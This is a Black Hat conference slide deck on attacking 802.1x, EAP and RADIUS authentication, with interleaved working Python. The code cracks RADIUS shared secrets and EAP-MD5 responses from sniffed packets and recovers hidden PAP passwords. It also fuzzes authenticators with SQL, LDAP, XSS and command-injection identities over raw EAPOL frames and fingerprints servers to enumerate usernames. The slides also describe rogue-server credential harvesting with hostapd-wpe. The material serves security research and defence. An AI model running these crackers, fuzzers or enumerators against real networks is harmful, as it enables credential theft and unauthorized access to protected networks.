802.1x and beyond! - Black Hat Briefings · 2015-05-28


802.1x and BEYOND!

Brad Antoniewicz

www.foundstone.com

Copyright © 2014

McAfee, Inc. 2 [email protected] @brad_anton @foundstone

Hi, I’m @brad_anton


Agenda

About 802.1x

Attacks

Fuzzing/Tools



IEEE 802.1x: Port-Based Network Access Control

Cause not everyone is welcome at church?


Flow (IEEE 802.1x): Supplicant <-> Authenticator <-> Authentication Server


802.11: Wireless Client <-> Access Point <-> RADIUS Server


Ethernet: Wired Client <-> Network Switch <-> RADIUS Server


TRUSTED UNTRUSTED


What if I….

Cisco ACS 4.2



EAP: Extensible Authentication Protocol (RFC 3748)


EAP over 802.1x (Layer 2)


EAP Type: PEAP, EAP-TTLS, EAP-FAST, etc.. (Layer 2)


EAP over RADIUS


DALAI LAMA


RADIUS (Layer 3)


RADIUS: Remote Authentication Dial-In User Service (RFC 2865/2869)

DSL/Dialup, VPN


Integration with a user database: Active Directory, SecurID, LDAP


Surface


Surface

External Auth Handler

RADIUS/EAP/Types and 802.1x/EAP/Types (protocol/configuration/handling issues)


Surface: Mgmt Web UI


Attacks


Sniffing (Protocol Issue)

Offline brute-force:

• Shared Secret / User-Password: john

• CHAP: hashcat

• EAP data: asleap, eapmd5pass

Clear-text data:

• User-Name AVP / EAP Identity

• NAS-Id

• Calling-Station-Id

• State

No need to be fancy, just use Wireshark
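The flow slides above show EAP riding inside EAPOL on the supplicant side and inside RADIUS on the authenticator side; this slide points out that everything in those packets except the shared secret is clear-text. The following is an added example, not code from the deck or from the author's tools, that builds both encapsulations and then runs the three offline attacks named above against the bytes a sniffer would see: recovering the NAS/server shared secret from Message-Authenticator, unhiding a PAP User-Password with it, and cracking an EAP-MD5 response. The shared secret, wordlist, MAC addresses and attribute values are constructed sample data.

```python
import hashlib
import hmac
import os
import struct

EAP_REQUEST, EAP_RESPONSE, EAP_MD5 = 1, 2, 4                        # RFC 3748 codes / type
ACCESS_REQUEST = 1                                                  # RFC 2865 code
USER_NAME, USER_PASSWORD, NAS_IDENTIFIER, EAP_MESSAGE, MESSAGE_AUTHENTICATOR = 1, 2, 32, 79, 80

def eap_packet(code, ident, eap_type, data=b""):
    """EAP: Code(1) Identifier(1) Length(2) Type(1) Type-Data."""
    return struct.pack("!BBHB", code, ident, 5 + len(data), eap_type) + data

def eapol_frame(dst, src, eap):
    """802.1X on the wire: Ethernet header, EtherType 0x888E, EAPOL v1 type 0 (EAP-Packet)."""
    return dst + src + b"\x88\x8e" + struct.pack("!BBH", 1, 0, len(eap)) + eap

def avp(attr_type, value):
    """RADIUS attribute: Type(1) Length(1) Value."""
    return bytes([attr_type, 2 + len(value)]) + value

def access_request(ident, secret, attrs, authenticator):
    """Access-Request ending in Message-Authenticator (RFC 2869 5.14): HMAC-MD5 keyed
    with the NAS/server shared secret over the whole packet with that AVP zeroed."""
    body = b"".join(avp(t, v) for t, v in attrs) + avp(MESSAGE_AUTHENTICATOR, b"\0" * 16)
    hdr = struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(body))
    mac = hmac.new(secret, hdr + authenticator + body, hashlib.md5).digest()
    return hdr + authenticator + body[:-16] + mac

def parse(pkt):
    """-> (code, ident, authenticator, [(type, value, offset), ...]); all of it is clear-text."""
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    attrs, i = [], 20
    while i < length:
        attrs.append((pkt[i], pkt[i + 2:i + pkt[i + 1]], i))
        i += pkt[i + 1]
    return code, ident, pkt[4:20], attrs

def hide_password(password, secret, authenticator):
    """RFC 2865 5.2 User-Password hiding: c_i = p_i XOR MD5(secret + c_(i-1)), c_0 = Authenticator."""
    pw, out, prev = password + b"\0" * (-len(password) % 16), b"", authenticator
    for i in range(0, len(pw), 16):
        prev = bytes(a ^ b for a, b in zip(pw[i:i + 16], hashlib.md5(secret + prev).digest()))
        out += prev
    return out

def unhide_password(hidden, secret, authenticator):
    """Inverse of hide_password: the secret plus a pcap gives up the password."""
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        out += bytes(a ^ b for a, b in zip(hidden[i:i + 16], hashlib.md5(secret + prev).digest()))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\0")

def crack_secret(pkt, wordlist):
    """Offline brute force of the shared secret from one sniffed Access-Request:
    recompute Message-Authenticator per candidate and compare (the attack the slide hands to john)."""
    mac, off = next((v, o) for t, v, o in parse(pkt)[3] if t == MESSAGE_AUTHENTICATOR)
    zeroed = pkt[:off + 2] + b"\0" * 16 + pkt[off + 18:]
    for cand in wordlist:
        if hmac.compare_digest(hmac.new(cand, zeroed, hashlib.md5).digest(), mac):
            return cand
    return None

def crack_eap_md5(ident, challenge, response, wordlist):
    """EAP-MD5 (RFC 3748 5.4): Response = MD5(Identifier || password || challenge), eapmd5pass-style."""
    for cand in wordlist:
        if hashlib.md5(bytes([ident]) + cand + challenge).digest() == response:
            return cand
    return None

# Constructed sample traffic, not a real capture. The attacker sees everything
# below except SECRET and the users' passwords.
SECRET, WORDLIST = b"testing123", [b"password", b"radius", b"testing123", b"Summer2014"]
PAE_GROUP_MAC, SWITCH_MAC, SUPPLICANT_MAC = b"\x01\x80\xc2\x00\x00\x03", b"\x00\xaa\xbb\xcc\xdd\xee", b"\x00\x11\x22\x33\x44\x55"

def demo():
    # Capture 1: a PAP Access-Request between switch and RADIUS server.
    auth = os.urandom(16)
    req = access_request(7, SECRET, [(USER_NAME, b"CORP\\jdoe"), (NAS_IDENTIFIER, b"sw-floor3"),
                                     (USER_PASSWORD, hide_password(b"Summer2014", SECRET, auth))], auth)
    secret = crack_secret(req, WORDLIST)
    _, _, req_auth, attrs = parse(req)
    hidden = next(v for t, v, _ in attrs if t == USER_PASSWORD)
    # Capture 2: an EAP-MD5 exchange on the supplicant's Ethernet segment (EAP inside EAPOL).
    challenge = os.urandom(16)
    eap_req = eap_packet(EAP_REQUEST, 2, EAP_MD5, bytes([16]) + challenge)
    eap_resp = eap_packet(EAP_RESPONSE, 2, EAP_MD5,
                          bytes([16]) + hashlib.md5(bytes([2]) + b"radius" + challenge).digest())
    frames = [eapol_frame(SUPPLICANT_MAC, SWITCH_MAC, eap_req), eapol_frame(PAE_GROUP_MAC, SUPPLICANT_MAC, eap_resp)]
    # The switch relays that same EAP packet to the server unchanged, inside EAP-Message AVP 79.
    relayed = access_request(8, SECRET, [(USER_NAME, b"jdoe"), (EAP_MESSAGE, eap_resp)], os.urandom(16))
    value = frames[1][24:40]  # Ethernet 14 + EAPOL 4 + EAP header 5 + Value-Size 1
    return {"secret": secret, "password": unhide_password(hidden, secret, req_auth),
            "eap_md5_password": crack_eap_md5(2, challenge, value, WORDLIST),
            "relayed_eap_intact": next(v for t, v, _ in parse(relayed)[3] if t == EAP_MESSAGE) == eap_resp}
```

Once the shared secret falls, every User-Password hidden with it, past or future, is readable from a capture, which is why the attack against Message-Authenticator is worth more than the one password it starts from.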


(Configuration Issue)

Impersonation

Attacker Controlled


(Configuration Issue)

FreeRADIUS-WPE


(Configuration Issue)

hostapd-wpe https://github.com/OpenSecurityResearch/hostapd-wpe

• Supports Tons of EAP-Types (including EAP-FAST Phase 0)

• Always Returns EAP-Success

• Requests PAP first

• Responds to all 802.11 probe requests

• Heartbleed (Cupid)

• Saves to file/outputs NETNTLM format

Thanks to JoMo-Kun, @lgrangeia, and @haxorthematrix for patches/functionality and improvement suggestions



RADIUS/EAP/802.1x

Fuzz


Peach Overview

• DataModel

• StateModel

• Publisher

• Agent(s)

• Transformers, mutators, etc..

• Targets


DataModels

EAP: Eap.xml, EapFast.xml, EapGtc.xml, EapLeap.xml, EapMd5.xml, EapMschapv2.xml, EapPeap.xml, EapTls.xml, EapTlv.xml

RADIUS: Radius.xml

Supporting protocols: Tls.xml, Mschapv2.xml

Utilities: Utils.xml

802.1x: Ieee802.1x.xml


DataModel: Radius.xml, with a StateModel and tests (tests vs. DataModel) per target:

• Cisco ACS

• TekRADIUS

• MS NPS/IAS

• SBR/FreeRadius

Fuzzers: UDPPublisher



Publishers (all via wired, supports all tunneled EAP Types)

RadiusPublisher: Eap.xml

RadiusPeapPublisher: Eap.xml (TLS)

EthernetPeapPublisher: Eap.xml (TLS)

RawEthernetPublisher: Ieee8021x.xml


Surface: Mgmt Web UI

StringMutator.Data.cs:

    namespace Peach.Core.Mutators
    {
        public partial class StringMutator
        {
            static readonly string[] values = new string[] {
                // LDAP Injection, XSS, SQL Injection, CMD Injection, etc...
            };
        }
    }
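Patching injection strings into Peach's StringMutator, as above, targets what sits behind the authenticator: the EAP Identity becomes the User-Name the server passes to LDAP/SQL and shows in its management web UI. The generator below is an added example, not Peach's code or the author's Ieee8021x.xml model, that produces the kind of cases a RawEthernetPublisher would hand to an 802.1x target: injection strings in EAP-Response/Identity, plus broken Length fields at the EAP and EAPOL layers, reserved type codes and EAPOL versions. The payload list, identity and MAC addresses are constructed; `send_raw` is a plain AF_PACKET sender for Linux.

```python
import struct

# Payloads in the spirit of the StringMutator patch (constructed here, not Peach's list).
INJECTION_STRINGS = [b"' or 1=1--", b"*)(uid=*))(|(uid=*", b"<script>alert(1)</script>",
                     b"`id`", b"%s%s%s%n", b"A" * 300, b"\x00", b"..\\..\\"]
BASE_IDENTITY = b"CORP\\jdoe"
EAPOL_ETHERTYPE = b"\x88\x8e"

def eap_response(ident, eap_type, data, declared_len=None):
    """EAP-Response; declared_len overrides the Length field to break the size relation."""
    length = 5 + len(data) if declared_len is None else declared_len
    return struct.pack("!BBHB", 2, ident, length & 0xFFFF, eap_type) + data

def eapol(eap, version=1, ptype=0, declared_len=None):
    """EAPOL header (Version, Type 0 = EAP-Packet, Body Length) in front of the EAP packet."""
    length = len(eap) if declared_len is None else declared_len
    return struct.pack("!BBH", version, ptype, length & 0xFFFF) + eap

def eap_identity_cases():
    """(name, EAPOL body) pairs: the EAP-Response/Identity an authenticator or an
    eapol_test-driven server would receive, with string, length, type and version mutations."""
    for s in INJECTION_STRINGS:                 # string mutations: Identity becomes User-Name,
        yield f"identity:{s!r}", eapol(eap_response(1, 1, s))   # which reaches LDAP/SQL/web-UI code
    good = 5 + len(BASE_IDENTITY)
    for bad in (0, 4, good - 1, good + 1, 0xFFFF):            # EAP Length disagrees with bytes on the wire
        yield f"eap_len:{bad}", eapol(eap_response(1, 1, BASE_IDENTITY, declared_len=bad))
    for bad in (0, 3, 0xFFFF):                                 # EAPOL Body Length disagrees as well
        yield f"eapol_len:{bad}", eapol(eap_response(1, 1, BASE_IDENTITY), declared_len=bad)
    for t in (0, 3, 254, 255):                                 # reserved, NAK, expanded, experimental types
        yield f"type:{t}", eapol(eap_response(1, t, BASE_IDENTITY))
    for v in (0, 2, 3, 255):                                   # EAPOL protocol version
        yield f"eapol_ver:{v}", eapol(eap_response(1, 1, BASE_IDENTITY), version=v)
    for pt in (1, 2, 3, 4, 255):                               # EAPOL-Start, Logoff, Key, ASF-Alert, unknown
        yield f"eapol_type:{pt}", eapol(b"", ptype=pt)

def frames(src=b"\x00\x11\x22\x33\x44\x55", dst=b"\x01\x80\xc2\x00\x00\x03"):
    """Full Ethernet frames for a raw-socket publisher (dst is the 802.1X PAE group address)."""
    return [(name, dst + src + EAPOL_ETHERTYPE + body) for name, body in eap_identity_cases()]

def send_raw(iface, cases):
    """Linux only, needs CAP_NET_RAW: write each case straight onto the wire, no supplicant in the way."""
    import socket
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        for _, frame in cases:
            s.send(frame)
```

Sending the frames yourself, rather than through wpa_supplicant, matters because a conforming supplicant will refuse to emit most of the length and type mutations; the target's own parser never sees them otherwise.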


RADIUS/802.1x/EAP


Tools

Existing: libeap, pyradius

Releasing: Radius .Net (forked), Eap .Net, OpenSSL .NET ..i know.. “ugh .Net”


Libz

OpenSSL.NET (Fork)

    SslUdp SslClient = new SslUdp(false);
    SslUdp SslSvr = new SslUdp(pub, priv, true);
    SslSvr.Send(ePkt.RawData);

Eap.NET (New)

    RadiusEapSession eClient = new RadiusEapSession(host, secret);
    EthernetEapSession eSvr = new EthernetEapSession(dev, pub, priv);
    EapPacket ePkt = new EapPacket(bytes);            // Recv
    EapPacket ePkt = new EapPacket(Code, Type, ID);
    ePkt.SetEapData(bytes);


Profiling (RadiusEapProfiler.exe)

State AVP (RADIUS): maintains state of the connection; active/passive

• Cisco: “acs/Number/Number”

• MS NPS: 38 bytes

EAP-Response/Identity username

• MS NPS: will reject if not valid

• Others: doesn’t matter

Message-Authenticator (RADIUS)

• Cisco: ignores

• Others: Access-Reject


Brute-Force or Enumeration …whatever (eapEnum.exe)

Password: a.k.a. active brute force (..meh)

Usernames: NPS, via EAP-Response/Identity

EAP-Type: client downgrade
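The profiling slide and this one describe the same handful of server tells: the shape of the State AVP, whether a bad Message-Authenticator is still answered with an Access-Challenge, whether an unknown name is rejected at EAP-Response/Identity, and which EAP types the server will run when the client NAKs. The following is an added example, not RadiusEapProfiler.exe or eapEnum.exe, that turns those tells into decision functions. The Cisco State regex assumes the slide's "Number" fields are decimal digits; the two server stand-ins (ACS, NPS) are constructed to behave as the slides describe, including made-up EAP type sets, and are not captures from real servers.

```python
import re
import struct

ACCESS_REJECT, ACCESS_CHALLENGE, STATE = 3, 11, 24          # RFC 2865 codes / State attribute
# EAP method numbers a NAK can propose; the server's next Request shows what it will run.
EAP_TYPES = {4: "MD5", 6: "GTC", 13: "TLS", 17: "LEAP", 21: "TTLS", 25: "PEAP", 26: "MSCHAPv2", 43: "FAST"}
CISCO_ACS_STATE = re.compile(rb"^acs/\d+/\d+$")              # assumption: "Number" means decimal digits

def attributes(pkt):
    """RADIUS attributes after the 20-byte header, grouped by type."""
    out, i, length = {}, 20, struct.unpack("!H", pkt[2:4])[0]
    while i < length:
        out.setdefault(pkt[i], []).append(pkt[i + 2:i + pkt[i + 1]])
        i += pkt[i + 1]
    return out

def profile_state(challenge):
    """Passive: classify the server by the State AVP in its first Access-Challenge."""
    states = attributes(challenge).get(STATE)
    if not states:
        return "no State AVP"
    if CISCO_ACS_STATE.match(states[0]):
        return "Cisco ACS"
    if len(states[0]) == 38:
        return "MS NPS/IAS"
    return "unknown (%d-byte State)" % len(states[0])

def profile_message_authenticator(send):
    """Active: send(valid_ma) -> response code. Still being challenged with a garbage
    Message-Authenticator means the server never checks it."""
    if send(False) == ACCESS_CHALLENGE:
        return "ignores Message-Authenticator (Cisco-like)"
    return "verifies Message-Authenticator" if send(True) == ACCESS_CHALLENGE else "rejects regardless"

def profile_identity(send_identity, known=b"CORP\\jdoe", bogus=b"CORP\\no_such_user_8f3a"):
    """Active: send_identity(name) -> response code. A server that rejects an unknown name
    at EAP-Response/Identity is both fingerprintable and a username oracle."""
    if send_identity(known) == ACCESS_CHALLENGE and send_identity(bogus) == ACCESS_REJECT:
        return "validates identity before the EAP method (NPS-like): usernames enumerable"
    return "identity not validated before the EAP method"

def enumerate_eap_types(nak):
    """nak(eap_type) -> type of the server's next EAP-Request after the client NAKs with
    eap_type. Offered == requested means the server will run that method, which is also
    the list a rogue client can downgrade the conversation to."""
    return [name for t, name in sorted(EAP_TYPES.items()) if nak(t) == t]

def access_challenge(state):
    """Constructed Access-Challenge with one State AVP (authenticator zeroed; not a capture)."""
    body = bytes([STATE, 2 + len(state)]) + state
    return struct.pack("!BBH", ACCESS_CHALLENGE, 1, 20 + len(body)) + b"\0" * 16 + body

# Stand-ins for two servers, built to behave as the slides describe (type sets are made up).
ACS = {"challenge": access_challenge(b"acs/169302301/61"),
       "ma": lambda valid: ACCESS_CHALLENGE,
       "ident": lambda name: ACCESS_CHALLENGE,
       "nak": lambda t: t if t in (17, 25, 43) else 25}
NPS = {"challenge": access_challenge(bytes(range(38))),
       "ma": lambda valid: ACCESS_CHALLENGE if valid else ACCESS_REJECT,
       "ident": lambda name: ACCESS_CHALLENGE if name == b"CORP\\jdoe" else ACCESS_REJECT,
       "nak": lambda t: t if t in (13, 25) else 25}

def profile(server):
    return {"state": profile_state(server["challenge"]),
            "message_authenticator": profile_message_authenticator(server["ma"]),
            "identity": profile_identity(server["ident"]),
            "eap_types": enumerate_eap_types(server["nak"])}
```

Against a live target the three `send*` callables would wrap a real Access-Request sender; the decision logic stays the same, and the identity oracle is the one to report, since it turns an authentication server into a username enumerator for anyone on the wire.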


TODO: wpa_supplicant-wpe (enumeration/profiles/exploits)


Notes for the researchers

■ Don’t try to fuzz EAP over WiFi, through wpa_supplicant, or through an authenticator

■ eapol_test is great (“make eapol_test” in wpa_supplicant)

■ netsh lan reconnect will start an 802.1x connection on Windows 7 and 8.1

■ gflags +hpa +ust (page heap and user-mode stack traces) to find the real goodies


Exploitation

&


? @brad_anton

[email protected]

*many of the pics in this presentation were found on the internet – credit goes to images.google.com